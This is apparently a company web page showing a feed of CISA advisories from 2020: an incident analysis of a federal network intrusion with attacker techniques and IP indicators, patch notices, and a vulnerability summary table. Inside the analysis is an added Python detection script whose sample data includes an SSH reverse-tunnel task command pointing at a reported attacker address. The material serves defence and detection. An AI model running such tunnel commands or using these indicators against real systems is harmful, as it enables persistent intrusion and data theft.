Providing services for federal, state and local government ...
Our commercial entity operations, providing enterprise services ...
How do we prepare for what's to come next? See inside ...
I.T. News
We are constantly interested in the latest and up-to-date technology.
As we move forward with the software development we will continue to use new technologies to improve our products and the customer experience. And we will continue to develop our solutions with both new functionality and increasing integration with the latest major platforms.

In response to the growing market share of and interest in I.T. virtualization, we tailored our unique virtualization solution, vFleXtor, using proven, modern, up-to-date technology.

Timely information about security topics and threats:

CISA All NCAS Products
  • Original release date: September 24, 2020

    CISA became aware, via EINSTEIN (CISA's intrusion detection system that monitors federal civilian networks), of a potential compromise of a federal agency's network. In coordination with the affected agency, CISA conducted an incident response engagement, confirming malicious activity. The following information is derived exclusively from the incident response engagement and provides the threat actor's tactics, techniques, and procedures as well as indicators of compromise that CISA observed as part of the engagement.

    Threat Actor Activity

    The cyber threat actor had valid access credentials for multiple users' Microsoft Office 365 (O365) accounts and domain administrator accounts, which they leveraged for Initial Access [TA0001] to the agency's network (Valid Accounts [T1078]). First the threat actor logged into a user's O365 account from Internet Protocol (IP) address 91.219.236[.]166 and then browsed pages on a SharePoint site and downloaded a file (Data from Information Repositories: SharePoint [T1213.002]). The cyber threat actor connected multiple times by Transmission Control Protocol (TCP) from IP address 185.86.151[.]223 to the victim organization's virtual private network (VPN) server (Exploit Public-Facing Application [T1190]).

    CISA analysts were not able to determine how the cyber threat actor initially obtained the credentials. It is possible the cyber actor obtained the credentials from an unpatched agency VPN server by exploiting a known vulnerability, CVE-2019-11510, in Pulse Secure (Exploitation for Credential Access [T1212]). In April 2019, Pulse Secure released patches for several critical vulnerabilities, including CVE-2019-11510, which allows the remote, unauthenticated retrieval of files, including passwords.[1] CISA has observed wide exploitation of CVE-2019-11510 across the federal government.[2]

    After initial access, the threat actor performed Discovery [TA0007] by logging into an agency O365 email account from 91.219.236[.]166 and viewing and downloading help desk email attachments with "Intranet access" and "VPN passwords" in the subject line, despite already having privileged access (Email Collection [T1114], Unsecured Credentials: Credentials In Files [T1552.001]). (Note: these emails did not contain any passwords.) The actor logged into the same email account via Remote Desktop Protocol (RDP) from IP address 207.220.1[.]3 (External Remote Services [T1133]). The actor enumerated the Active Directory and Group Policy key and changed a registry key for the Group Policy (Account Manipulation [T1098]). Immediately afterward, the threat actor used common Microsoft Windows command line processes (conhost, ipconfig, net, query, netstat, ping, and whoami, plink.exe) to enumerate the compromised system and network (Command and Scripting Interpreter [T1059], System Network Configuration Discovery [T1016]).

    The cyber threat actor then attempted multiple times to connect to virtual private server (VPS) IP 185.86.151[.]223 through a Windows Server Message Block (SMB) client. Although they connected and disconnected multiple times, the connections were ultimately successful. During the same period, the actor used an alias secure identifier account they had previously created to log into VPS 185.86.151[.]223 via an SMB share. The attacker then executed plink.exe on a victim file server (Command and Scripting Interpreter [T1059]). (plink.exe is a command-line version of PuTTY that is used for remote administration.)

    The cyber threat actor established Persistence [TA0003] and Command and Control [TA0011] on the victim network by (1) creating a persistent Secure Socket Shell (SSH) tunnel/reverse SOCKS proxy, (2) running inetinfo.exe (a unique, multi-stage malware used to drop files), and (3) setting up a locally mounted remote share on IP address 78.27.70[.]237 (Proxy [T1090]). The mounted file share allowed the actor to freely move during its operations while leaving fewer artifacts for forensic analysis. Refer to Threat Actor Malware section for more information about the SSH Tunnel/reverse SOCKS proxy and inetinfo.exe.

    The cyber threat actor created a local account, which they used for data Collection [TA0009], Exfiltration [TA0010], Persistence [TA0003], and Command and Control [TA0011] (Create Account [T1136]). The cyber threat actor used the local account to:

    • Browse directories on a victim file server (Data from Shared Network Drive [T1039]).
    • Copy a file from a user's home directory to their locally mounted remote share (Data Staged [T1074]).
      • CISA analysts detected the cyber threat actor interacting with other files on users' home directories but could not confirm whether they were exfiltrated.
    • Create a reverse SMB SOCKS proxy that allowed connection between a cyber threat actor-controlled VPS and the victim organization's file server (refer to Threat Actor Malware section for more information) (Proxy [T1090]).
    • Interact with PowerShell module Invoke-TmpDavFS.psm (refer to Threat Actor Malware section for more information).
    • Exfiltrate data from an account directory and file server directory using tsclient (tsclient is a Microsoft Windows Terminal Services client) (Data from Local System [T1005], Data from Network Shared Drive [T1039]).
    • Create two compressed Zip files with several files and directories on them (Archive Collected Data [T1560]); it is likely that the cyber threat actor exfiltrated these Zip files, but this cannot be confirmed because the actor masked their activity.

    See figure 1 for the sequence of the cyber threat actor's tactics and techniques.


    Figure 1: Cyber threat actor tactics and techniques

    Threat Actor Malware

    Persistent SSH Tunnel/Reverse SOCKS Proxy

    While logged in as "Administrator," the cyber threat actor created two Scheduled Tasks (see table 1) that worked in concert to establish a persistent SSH tunnel and reverse SOCKS proxy. The proxy allowed connections between an attacker-controlled remote server and one of the victim organization's file servers (Scheduled Task/Job [T1053], Proxy [T1090]). The Reverse SOCKS Proxy communicated through port 8100 (Non-Standard Port [T1571]). This port is normally closed, but the attacker's malware opened it.

    Table 1: Scheduled Tasks composing SSH tunnel and reverse SOCKS proxy

    Scheduled Task: ShellExperienceHost.exe
    Description: This task created a persistent SSH tunnel to attacker-controlled remote server 206.189.18[.]189 and employed port forwarding to allow connections from the remote server port 39999 to the victim file server through port 8100. This task was run daily. ShellExperienceHost.exe is a version of plink.exe, a command-line version of PuTTY that is used for remote administration.

    Scheduled Task: WinDiag.exe
    Description: This task is a reverse SOCKS proxy that is preconfigured to bind to and listen on TCP port 8100. WinDiag.exe received responses through the SSH tunnel and forwarded the responses through port 8100 to the VPS IP address 185.193.127[.]17 over port 443. This task was run on boot. WinDiag.exe had compile information that matched the VPS login name.

    Dropper Malware: inetinfo.exe

    The threat actor created a Scheduled Task to run inetinfo.exe (Scheduled Task/Job [T1053]). inetinfo.exe is a unique, multi-stage malware used to drop files (figure 2). It dropped system.dll and 363691858 files and a second instance of inetinfo.exe. The system.dll from the second instance of inetinfo.exe decrypted 363691858 as binary from the first instance of inetinfo.exe. The decrypted 363691858 binary was injected into the second instance of inetinfo.exe to create and connect to a locally named tunnel. The injected binary then executed shellcode in memory that connected to IP address 185.142.236[.]198, which resulted in download and execution of a payload.


    Figure 2: Dropper malware inetinfo.exe

    The cyber threat actor was able to overcome the agency's anti-malware protection, and inetinfo.exe escaped quarantine. CISA analysts determined that the cyber threat actor accessed the anti-malware product's software license key and installation guide and then visited a directory used by the product for temporary file analysis. After accessing this directory, the cyber threat actor was able to run inetinfo.exe (Impair Defenses: Disable or Modify Tools [T1562.001]).

    Reverse SMB SOCKS Proxy

    PowerShell script HardwareEnumeration.ps1 created a reverse SMB SOCKS proxy that allowed connection between attacker-controlled VPS IP 185.193.127[.]18 and the victim organization's file server over port 443 (Command and Scripting Interpreter: PowerShell [T1059.001], Proxy [T1090]). PowerShell script HardwareEnumeration.ps1 was executed daily via a Scheduled Task (Scheduled Task/Job [T1053]).

    HardwareEnumeration.ps1 is a copy of Invoke-SocksProxy.ps1, a free tool created and distributed by a security researcher on GitHub.[3] Invoke-SocksProxy.ps1 creates a reverse proxy from the local machine to attacker infrastructure through SMB TCP port 445 (Non-Standard Port [T1571]). The script was likely altered with the cyber threat actor's configuration needs.

    PowerShell Module: invoke-TmpDavFS.psm

    invoke-TmpDavFS.psm is a PowerShell module that creates a Web Distributed Authoring and Versioning (WebDAV) server that can be mounted as a file system and communicates over TCP port 443 and TCP port 80. invoke-TmpDavFS.psm is distributed on GitHub.[4]
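
    One way to hunt for the Scheduled Task and proxy indicators described above, as an added example that is not part of the CISA report: it checks `schtasks /query /fo csv /v` and `netstat -ano` text for the reported file names, the TCP 8100 listener, the reported IP addresses and an SSH remote-forward argument. The file names, port and addresses come from the report; the sample output, host name FS01, file paths and the stock-directory list are constructed assumptions.

```python
import csv
import io
import re

# Indicators taken from the report above; IP addresses are stored defanged.
TASK_FILE_NAMES = ("hardwareenumeration.ps1", "inetinfo.exe",
                   "shellexperiencehost.exe", "windiag.exe")
REPORTED_IPS_DEFANGED = (
    "206.189.18[.]189", "185.193.127[.]17", "185.193.127[.]18", "185.86.151[.]223",
    "185.142.236[.]198", "78.27.70[.]237", "91.219.236[.]166", "207.220.1[.]3",
)
PROXY_PORT = 8100  # reverse SOCKS proxy listener named in the report

# Assumption, not from the report: stock Windows locations of binaries that share
# a name with the reported files. The same name run from elsewhere is flagged.
EXPECTED_DIRS = {"shellexperiencehost.exe": "c:\\windows\\systemapps\\",
                 "inetinfo.exe": "c:\\windows\\system32\\inetsrv\\"}

# SSH remote port forward as accepted by plink/ssh: -R listen_port:host:port
REMOTE_FORWARD = re.compile(r"(?<!\S)-R\s+(\d{1,5}):[^\s:]+:(\d{1,5})\b")


def refang(ip):
    return ip.replace("[.]", ".")


REPORTED_IPS = sorted(refang(ip) for ip in REPORTED_IPS_DEFANGED)


def hits_for_action(action):
    """Return the reasons a scheduled-task command line matches the report."""
    reasons = []
    low = action.lower()
    for name in TASK_FILE_NAMES:
        # Either a drive-qualified path without spaces, or the bare file name.
        pattern = (r'(?:([a-z]:\\(?:[^"\s\\]+\\)*)|(?<![\w.-]))'
                   + re.escape(name) + r'(?![\w.])')
        match = re.search(pattern, low)
        if not match:
            continue
        directory = match.group(1) or ""
        expected = EXPECTED_DIRS.get(name)
        if expected and directory.startswith(expected):
            continue  # same name, but in the stock location
        reasons.append(f"runs {name} from {directory or 'an unparsed path'}")
    forward = REMOTE_FORWARD.search(action)
    if forward:
        reasons.append(f"SSH remote forward {forward.group(1)} -> {forward.group(2)}")
    for ip in REPORTED_IPS:
        if re.search(r"(?<![\d.])" + re.escape(ip) + r"(?!\.?\d)", action):
            reasons.append(f"references reported address {ip}")
    return reasons


def scan_tasks(csv_text):
    """Return (task name, schedule type, reasons) for each matching task row."""
    findings = []
    for row in csv.DictReader(io.StringIO(csv_text)):
        if row.get("TaskName") == "TaskName":
            continue  # skip a repeated header row if the export contains one
        reasons = hits_for_action(row.get("Task To Run") or "")
        if reasons:
            findings.append((row.get("TaskName"), row.get("Schedule Type"), reasons))
    return findings


def scan_netstat(text):
    """Return (pid, reason) for TCP rows that match the reported port or addresses."""
    findings = []
    for line in text.splitlines():
        parts = line.split()
        if len(parts) != 5 or parts[0] != "TCP":
            continue
        local, foreign, state, pid = parts[1], parts[2], parts[3], int(parts[4])
        if state == "LISTENING" and local.rsplit(":", 1)[-1] == str(PROXY_PORT):
            findings.append((pid, f"listening on TCP {PROXY_PORT}"))
        if foreign.rsplit(":", 1)[0] in REPORTED_IPS:
            findings.append((pid, f"connection to reported address {foreign}"))
    return findings


# Constructed sample output (not from the report); paths and host name are invented.
SAMPLE_TASKS_CSV = "\n".join([
    r'"HostName","TaskName","Task To Run","Run As User","Schedule Type"',
    r'"FS01","\Microsoft\Windows\Defrag\ScheduledDefrag","%windir%\system32\defrag.exe -c","SYSTEM","On demand only"',
    r'"FS01","\ShellExperienceHost","C:\Users\Public\ShellExperienceHost.exe -N -R 39999:127.0.0.1:8100 tunnel@TUNNEL_HOST","Administrator","Daily"',
    r'"FS01","\WinDiag","C:\Windows\Temp\WinDiag.exe","Administrator","At system start up"',
    r'"FS01","\HardwareEnumeration","powershell.exe -File C:\ProgramData\HardwareEnumeration.ps1","Administrator","Daily"',
]).replace("TUNNEL_HOST", refang("206.189.18[.]189"))
SAMPLE_NETSTAT = "\n".join([
    "  Proto  Local Address          Foreign Address        State           PID",
    "  TCP    0.0.0.0:135            0.0.0.0:0              LISTENING       912",
    "  TCP    0.0.0.0:8100           0.0.0.0:0              LISTENING       4321",
    "  TCP    10.0.0.5:49712         VPS_HOST:443           ESTABLISHED     4321",
]).replace("VPS_HOST", refang("185.193.127[.]17"))

if __name__ == "__main__":
    print(scan_tasks(SAMPLE_TASKS_CSV), scan_netstat(SAMPLE_NETSTAT))
```

    File names alone are weak evidence because two of them match stock Windows binaries, so the check reports the directory and skips the assumed stock locations.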

    This product is provided subject to this Notification and this Privacy & Use policy.

  • Original release date: September 24, 2020

    The Cybersecurity and Infrastructure Security Agency (CISA) is aware of active exploitation of CVE-2020-1472, an elevation of privilege vulnerability in Microsoft's Netlogon. A remote attacker can exploit this vulnerability to breach unpatched Active Directory domain controllers and obtain domain administrator access. Applying patches from Microsoft's August 2020 Security Advisory for CVE-2020-1472 can prevent exploitation of this vulnerability.

    CISA has released a patch validation script to detect unpatched Microsoft domain controllers. CISA urges administrators to patch all domain controllers immediately; until every domain controller is updated, the entire infrastructure remains vulnerable. Review the following resources for more information:


  • Original release date: September 22, 2020

    Mozilla has released security updates to address vulnerabilities in Firefox and Firefox ESR. An attacker could exploit some of these vulnerabilities to take control of an affected system.

    The Cybersecurity and Infrastructure Security Agency (CISA) encourages users and administrators to review the Mozilla Security Advisories for Firefox 81 and Firefox ESR 78.3 and apply the necessary updates.


  • Original release date: September 22, 2020 | Last revised: September 23, 2020

    This Alert uses the MITRE Adversarial Tactics, Techniques, and Common Knowledge (ATT&CK®) framework. See the ATT&CK for Enterprise frameworks for all referenced threat actor techniques.

    This product was written by the Cybersecurity and Infrastructure Security Agency (CISA) with contributions by the Multi-State Information Sharing & Analysis Center (MS-ISAC).

    CISA has observed a notable increase in the use of LokiBot malware by malicious cyber actors since July 2020. Throughout this period, CISA's EINSTEIN Intrusion Detection System, which protects federal, civilian executive branch networks, has detected persistent malicious LokiBot activity. LokiBot uses a credential- and information-stealing malware, often sent as a malicious attachment and known for being simple, yet effective, making it an attractive tool for a broad range of cyber actors across a wide variety of data compromise use cases.


  • Original release date: September 22, 2020

    Google has updated the stable channel for Chrome to 85.0.4183.121 for Windows, Mac, and Linux. This version addresses vulnerabilities that an attacker could exploit to take control of an affected system.

    The Cybersecurity and Infrastructure Security Agency (CISA) encourages users and administrators to review the stable channel update and apply the necessary changes.


  • Original release date: September 21, 2020

    The Samba Team has released a security update to address a critical vulnerability, CVE-2020-1472, in multiple versions of Samba. This vulnerability could allow a remote attacker to take control of an affected system.

    The Cybersecurity and Infrastructure Security Agency (CISA) encourages users and administrators to review the Samba Security Announcement for CVE-2020-1472 and apply the necessary updates or workaround.


  • Original release date: September 21, 2020

     

    High Vulnerabilities

    Primary Vendor -- Product | Description | Published | CVSS Score | Source & Patch Info
    apache -- struts Apache Struts 2.0.0 to 2.5.20 forced double OGNL evaluation, when evaluated on raw user input in tag attributes, may lead to remote code execution. 2020-09-14 7.5 CVE-2019-0230
    MISC
    dlink -- covr-2600r_firmware D-Link COVR-2600R and COVR-3902 Kit before 1.01b05Beta01 use hardcoded credentials for telnet connection, which allows unauthenticated attackers to gain privileged access to the router, and to extract sensitive data or modify the configuration. 2020-09-14 10 CVE-2018-20432
    MISC
    MISC
    google -- android An issue was discovered on LG mobile devices with Android OS 8.0, 8.1, 9.0, and 10 software. BT manager allows attackers to bypass intended access restrictions on a certain mode. The LG ID is LVE-SMP-200021 (September 2020). 2020-09-11 7.5 CVE-2020-25283
    MISC
    google -- android An issue was discovered on LG mobile devices with Android OS 10 software. The lguicc software (for the LG Universal Integrated Circuit Card) allows attackers to bypass intended access restrictions on property values. The LG ID is LVE-SMP-200020 (September 2020). 2020-09-11 7.5 CVE-2020-25282
    MISC
    hyland -- onbase An issue was discovered in Hyland OnBase through 18.0.0.32 and 19.x through 19.8.9.1000. It allows remote attackers to execute arbitrary code because of unsafe JSON deserialization. 2020-09-11 7.5 CVE-2020-25260
    MISC
    hyland -- onbase An issue was discovered in Hyland OnBase through 18.0.0.32 and 19.x through 19.8.9.1000. It uses XML deserialization libraries in an unsafe manner. 2020-09-11 7.5 CVE-2020-25259
    MISC
    hyland -- onbase An issue was discovered in Hyland OnBase through 18.0.0.32 and 19.x through 19.8.9.1000. It uses ASP.NET BinaryFormatter.Deserialize in a manner that allows attackers to transmit and execute bytecode in SOAP messages. 2020-09-11 7.5 CVE-2020-25258
    MISC
    hyland -- onbase An issue was discovered in Hyland OnBase through 18.0.0.32 and 19.x through 19.8.9.1000. It allows SQL injection, as demonstrated by TestConnection_LocalOrLinkedServer, CreateFilterFriendlyView, or AddWorkViewLinkedServer. 2020-09-11 7.5 CVE-2020-25254
    MISC
    hyland -- onbase An issue was discovered in Hyland OnBase through 18.0.0.32. It allows SQL injection, as demonstrated by the TableName, ColumnName, Name, UserId, or Password parameter. 2020-09-11 7.5 CVE-2020-25253
    MISC
    ibm -- maximo_asset_management IBM Maximo Asset Management 7.6.0 and 7.6.1 could allow a remote authenticated attacker to execute arbitrary code on the system, caused by an unsafe deserialization in Java. By sending specially-crafted request, an attacker could exploit this vulnerability to execute arbitrary code on the system. IBM X-Force ID: 182396. 2020-09-15 9 CVE-2020-4521
    XF
    CONFIRM
    jenkins -- selection_tasks Jenkins Selection tasks Plugin 1.0 and earlier executes a user-specified program on the Jenkins controller, allowing attackers with Job/Configure permission to execute an arbitrary system command on the Jenkins controller as the OS user that the Jenkins process is running as. 2020-09-16 9 CVE-2020-2276
    MLIST
    CONFIRM
    lemonldap-ng -- lemonldap\ An issue was discovered in LemonLDAP::NG through 2.0.8, when NGINX is used. An attacker may bypass URL-based access control to protected Virtual Hosts by submitting a non-normalized URI. This also affects versions before 0.5.2 of the "Lemonldap::NG handler for Node.js" package. 2020-09-14 7.5 CVE-2020-24660
    CONFIRM
    CONFIRM
    MISC
    DEBIAN
    mcafee -- web_gateway Privilege Escalation vulnerability in McAfee Web Gateway (MWG) prior to 9.2.1 allows authenticated user interface user with low permissions to change the system's root password via improper access controls in the user interface. 2020-09-15 7.7 CVE-2020-7293
    MISC
    mi -- r3600_firmware In Xiaomi router R3600 ROM version<1.0.66, filters in the set_WAN6 interface can be bypassed, causing remote code execution. The router administrator can gain root access from this vulnerability. 2020-09-11 10 CVE-2020-14100
    MISC
    mi -- xiaomi_ai_speaker_firmware Memory overflow in Xiaomi AI speaker Rom version <1.59.6 can happen when the speaker verifying a malicious firmware during OTA process. 2020-09-11 7.5 CVE-2020-14096
    MISC
    microsoft -- chakracore A remote code execution vulnerability exists in the way that the ChakraCore scripting engine handles objects in memory, aka 'Scripting Engine Memory Corruption Vulnerability'. This CVE ID is unique from CVE-2020-1057, CVE-2020-1172. 2020-09-11 7.6 CVE-2020-1180
    N/A
    microsoft -- chakracore A remote code execution vulnerability exists in the way that the ChakraCore scripting engine handles objects in memory, aka 'Scripting Engine Memory Corruption Vulnerability'. This CVE ID is unique from CVE-2020-1057, CVE-2020-1180. 2020-09-11 7.6 CVE-2020-1172
    N/A
    microsoft -- edge A remote code execution vulnerability exists in the way that the ChakraCore scripting engine handles objects in memory, aka 'Scripting Engine Memory Corruption Vulnerability'. This CVE ID is unique from CVE-2020-1172, CVE-2020-1180. 2020-09-11 9.3 CVE-2020-1057
    N/A
    microsoft -- exchange_server A remote code execution vulnerability exists in Microsoft Exchange server due to improper validation of cmdlet arguments. An attacker who successfully exploited the vulnerability could run arbitrary code in the context of the System user, aka 'Microsoft Exchange Server Remote Code Execution Vulnerability'. 2020-09-11 9 CVE-2020-16875
    MISC
    N/A
    microsoft -- visual_studio A remote code execution vulnerability exists in Visual Studio when it improperly handles objects in memory, aka 'Visual Studio Remote Code Execution Vulnerability'. This CVE ID is unique from CVE-2020-16856. 2020-09-11 9.3 CVE-2020-16874
    N/A
    microsoft -- visual_studio A remote code execution vulnerability exists in Visual Studio when it improperly handles objects in memory, aka 'Visual Studio Remote Code Execution Vulnerability'. This CVE ID is unique from CVE-2020-16874. 2020-09-11 9.3 CVE-2020-16856
    N/A
    microsoft -- visual_studio_code A remote code execution vulnerability exists in Visual Studio Code when a user is tricked into opening a malicious 'package.json' file, aka 'Visual Studio JSON Remote Code Execution Vulnerability'. 2020-09-11 9.3 CVE-2020-16881
    N/A
    microsoft -- windows_10 An elevation of privilege vulnerability exists when the Windows Cryptographic Catalog Services improperly handle objects in memory, aka 'Windows Cryptographic Catalog Services Elevation of Privilege Vulnerability'. 2020-09-11 7.2 CVE-2020-0782
    N/A
    microsoft -- windows_10 An elevation of privilege vulnerability exists when the Connected User Experiences and Telemetry Service improperly handles file operations, aka 'Connected User Experiences and Telemetry Service Elevation of Privilege Vulnerability'. 2020-09-11 7.2 CVE-2020-1590
    N/A
    microsoft -- windows_10 A remote code execution vulnerability exists when the Windows Text Service Module improperly handles memory, aka 'Windows Text Service Module Remote Code Execution Vulnerability'. 2020-09-11 7.6 CVE-2020-0908
    N/A
    microsoft -- windows_10 A remote code execution vulnerability exists when Windows Media Audio Decoder improperly handles objects, aka 'Windows Media Audio Decoder Remote Code Execution Vulnerability'. This CVE ID is unique from CVE-2020-1593. 2020-09-11 9.3 CVE-2020-1508
    N/A
    microsoft -- windows_10 A remote code execution vulnerability exists in the way that Microsoft Windows Codecs Library handles objects in memory, aka 'Microsoft Windows Codecs Library Remote Code Execution Vulnerability'. This CVE ID is unique from CVE-2020-1129. 2020-09-11 9.3 CVE-2020-1319
    N/A
    microsoft -- windows_10 A remote code execution vulnerability exists in the way that the Windows Graphics Device Interface (GDI) handles objects in the memory, aka 'GDI+ Remote Code Execution Vulnerability'. 2020-09-11 9.3 CVE-2020-1285
    N/A
    microsoft -- windows_10 A remote code execution vulnerability exists when the Windows Jet Database Engine improperly handles objects in memory, aka 'Jet Database Engine Remote Code Execution Vulnerability'. This CVE ID is unique from CVE-2020-1039. 2020-09-11 9.3 CVE-2020-1074
    N/A
    microsoft -- windows_10 A remote code execution vulnerability exists when the Windows Jet Database Engine improperly handles objects in memory, aka 'Jet Database Engine Remote Code Execution Vulnerability'. This CVE ID is unique from CVE-2020-1074. 2020-09-11 9.3 CVE-2020-1039
    N/A
    microsoft -- windows_10 A remote code execution vulnerability exists when the Windows Camera Codec Pack improperly handles objects in memory, aka 'Windows Camera Codec Pack Remote Code Execution Vulnerability'. 2020-09-11 9.3 CVE-2020-0997
    N/A
    MISC
    microsoft -- windows_10 A remote code execution vulnerability exists in the way that Microsoft COM for Windows handles objects in memory, aka 'Microsoft COM for Windows Remote Code Execution Vulnerability'. 2020-09-11 9.3 CVE-2020-0922
    N/A
    microsoft -- windows_10 A security feature bypass vulnerability exists in Windows Defender Application Control (WDAC) which could allow an attacker to bypass WDAC enforcement, aka 'Windows Defender Application Control Security Feature Bypass Vulnerability'. 2020-09-11 7.2 CVE-2020-0951
    N/A
    microsoft -- windows_10 An elevation of privilege vulnerability exists when Microsoft Windows processes group policy updates, aka 'Group Policy Elevation of Privilege Vulnerability'. 2020-09-11 9.3 CVE-2020-1013
    N/A
    microsoft -- windows_10 An elevation of privilege vulnerability exists when the Shell infrastructure component improperly handles objects in memory, aka 'Shell infrastructure component Elevation of Privilege Vulnerability'. 2020-09-11 7.2 CVE-2020-0870
    N/A
    microsoft -- windows_10 An elevation of privilege vulnerability exists when DirectX improperly handles objects in memory, aka 'DirectX Elevation of Privilege Vulnerability'. This CVE ID is unique from CVE-2020-1053. 2020-09-11 7.2 CVE-2020-1308
    N/A
    microsoft -- windows_10 An elevation of privilege vulnerability exists in Windows when the Win32k component fails to properly handle objects in memory, aka 'Win32k Elevation of Privilege Vulnerability'. 2020-09-11 7.2 CVE-2020-1245
    N/A
    microsoft -- windows_10 An elevation of privilege vulnerability exists when NTFS improperly checks access, aka 'NTFS Elevation of Privilege Vulnerability'. 2020-09-11 7.2 CVE-2020-0838
    N/A
    microsoft -- windows_10 An elevation of privilege vulnerability exists when the Windows Print Spooler service improperly allows arbitrary writing to the file system, aka 'Windows Print Spooler Elevation of Privilege Vulnerability'. 2020-09-11 7.2 CVE-2020-1030
    N/A
    microsoft -- windows_10 An elevation of privilege vulnerability exists when the Windows Graphics Component improperly handles objects in memory, aka 'Windows Graphics Component Elevation of Privilege Vulnerability'. 2020-09-11 7.2 CVE-2020-0998
    N/A
    microsoft -- windows_10 An elevation of privilege vulnerability exists in the way that the Windows Kernel handles objects in memory, aka 'Windows Kernel Elevation of Privilege Vulnerability'. 2020-09-11 7.2 CVE-2020-1034
    N/A
    microsoft -- windows_10 An elevation of privilege vulnerability exists when Windows Modules Installer improperly handles objects in memory, aka 'Windows Modules Installer Elevation of Privilege Vulnerability'. 2020-09-11 7.2 CVE-2020-0911
    N/A
    microsoft -- windows_10 An elevation of privilege vulnerability exists when the Windows Storage Services improperly handle file operations, aka 'Windows Storage Services Elevation of Privilege Vulnerability'. This CVE ID is unique from CVE-2020-1559. 2020-09-11 7.2 CVE-2020-0886
    N/A
    projectworlds -- house_rental Projectworlds House Rental v1.0 suffers from an unauthenticated SQL Injection vulnerability, allowing remote attackers to execute arbitrary code on the hosting webserver via a malicious index.php POST request. 2020-09-15 7.5 CVE-2020-23833
    MISC
    MISC
    MISC

     

    Medium Vulnerabilities

    Primary Vendor -- Product | Description | Published | CVSS Score | Source & Patch Info
    accesspressthemes -- wp_floating_menu Wordpress Plugin Store / AccessPress Themes WP Floating Menu V1.3.0 is affected by: Cross Site Scripting (XSS) via the id GET parameter. 2020-09-14 4.3 CVE-2020-25378
    MISC
    apache -- cocoon When using the StreamGenerator, the code parse a user-provided XML. A specially crafted XML, including external system entities, could be used to access any file on the server system. 2020-09-11 5 CVE-2020-11991
    MISC
    apache -- struts An access permission override in Apache Struts 2.0.0 to 2.5.20 may cause a Denial of Service when performing a file upload. 2020-09-14 5 CVE-2019-0233
    MISC
    argosoft -- mail_server ArGo Soft Mail Server 1.8.8.9 is affected by Cross Site Request Forgery (CSRF) for perform remote arbitrary code execution. The component is the Administration dashboard. When using admin/user credentials, if the admin/user admin opens a website with the malicious page that will run the CSRF. 2020-09-11 6.8 CVE-2020-23824
    MISC
    atlassian -- jira Affected versions of Atlassian Jira Server and Data Center allow an unauthenticated user to enumerate users via an Information Disclosure vulnerability in the /ViewUserHover.jspa endpoint. The affected versions are before version 7.13.6, from version 8.0.0 before 8.5.7, and from version 8.6.0 before 8.12.0. 2020-09-17 5 CVE-2020-14181
    MISC
    blackcat-cms -- blackcat_cms An issue was discovered in BlackCat CMS v.1.3.6. There is a CSRF vulnerability (bypass csrf_token) that allows remote arbitrary code execution. 2020-09-15 6.8 CVE-2020-25453
    MISC
    bluetooth -- bluetooth_core_specification Devices supporting Bluetooth before 5.1 may allow man-in-the-middle attacks, aka BLURtooth. Cross Transport Key Derivation in Bluetooth Core Specification v4.2 and v5.0 may permit an unauthenticated user to establish a bonding with one transport, either LE or BR/EDR, and replace a bonding already established on the opposing transport, BR/EDR or LE, potentially overwriting an authenticated key with an unauthenticated key, or a key with greater entropy with one with less. 2020-09-11 4.3 CVE-2020-15802
    MISC
    MISC
    codoforum -- codoforum Codoforum 4.8.3 allows HTML Injection in the 'admin dashboard Manage users Section.' 2020-09-14 4.3 CVE-2020-21845
    MISC
    MISC
    cryptsetup_project -- cryptsetup A vulnerability was found in upstream release cryptsetup-2.2.0 where, there's a bug in LUKS2 format validation code, that is effectively invoked on every device/image presenting itself as LUKS2 container. The bug is in segments validation code in file 'lib/luks2/luks2_json_metadata.c' in function hdr_validate_segments(struct crypt_device *cd, json_object *hdr_jobj) where the code does not check for possible overflow on memory allocation used for intervals array (see statement "intervals = malloc(first_backup * sizeof(*intervals));"). Due to the bug, library can be *tricked* to expect such allocation was successful but for far less memory then originally expected. Later it may read data FROM image crafted by an attacker and actually write such data BEYOND allocated memory. 2020-09-16 6.8 CVE-2020-14382
    MISC
    FEDORA
    UBUNTU
    ctolog -- thinkadmin ThinkAdmin v6 is affected by a directory traversal vulnerability. An unauthorized attacker can read arbitrarily file on a remote server via GET request encode parameter. 2020-09-14 5 CVE-2020-25540
    MISC
    MISC
    MISC
    dataiku -- data_science_studio Dataiku DSS before 6.0.5 allows attackers write access to the project to modify the "Created by" metadata. 2020-09-14 5.5 CVE-2020-8817
    MISC
    CONFIRM
    ericsson -- rx8200_firmware Ericsson RX8200 5.13.3 devices are vulnerable to multiple reflected and stored XSS. An attacker has to inject JavaScript code directly in the "path" or "Services+ID" parameters and send the URL to a user in order to exploit reflected XSS. In the case of stored XSS, an attacker must modify the "name" parameter with the malicious code. 2020-09-14 4.3 CVE-2020-22158
    MISC
    gazie_project -- gazie Gazie 7.29 is affected by: Cross Site Scripting (XSS) via http://192.168.100.7/gazie/modules/config/admin_utente.php?user_name=amministratore&Update. An attacker can inject JavaScript code, and the webapplication stores the injected code. 2020-09-14 4.3 CVE-2020-21731
    MISC
    MISC
    MISC
    gitlab -- gitlab A vulnerability was discovered in GitLab versions before 13.1.10, 13.2.8 and 13.3.4. Under certain conditions GitLab was not properly revoking user sessions and allowed a malicious user to access a user account with an old password. 2020-09-14 6.5 CVE-2020-13302
    CONFIRM
    MISC
    MISC
    gitlab -- gitlab A vulnerability was discovered in GitLab versions before 13.1.10, 13.2.8 and 13.3.4. GitLab was not validating a Deploy-Token and allowed a disabled repository be accessible via a git command line. 2020-09-14 4 CVE-2020-13316
    CONFIRM
    MISC
    MISC
    gitlab -- gitlab A vulnerability was discovered in GitLab versions before 13.1.10, 13.2.8 and 13.3.4. Project reporters and above could see confidential EPIC attached to confidential issues 2020-09-14 4 CVE-2020-13287
    CONFIRM
    MISC
    MISC
    gitlab -- gitlab A vulnerability was discovered in GitLab versions before 13.1.10, 13.2.8 and 13.3.4. A user without 2 factor authentication enabled could be prohibited from accessing GitLab by being invited into a project that had 2 factor authentication inheritance. 2020-09-15 4 CVE-2020-13308
    CONFIRM
    MISC
    MISC
    gitlab -- gitlab A vulnerability was discovered in GitLab versions before 13.1.10, 13.2.8 and 13.3.4. An unauthorized project maintainer could edit the subgroup badges due to the lack of authorization control. 2020-09-14 4 CVE-2020-13313
    CONFIRM
    MISC
    MISC
    gitlab -- gitlab A vulnerability was discovered in GitLab versions before 13.1.10, 13.2.8 and 13.3.4. Due to improper verification of permissions, an unauthorized user can access a private repository within a public project. 2020-09-15 4 CVE-2020-13303
    CONFIRM
    MISC
    MISC
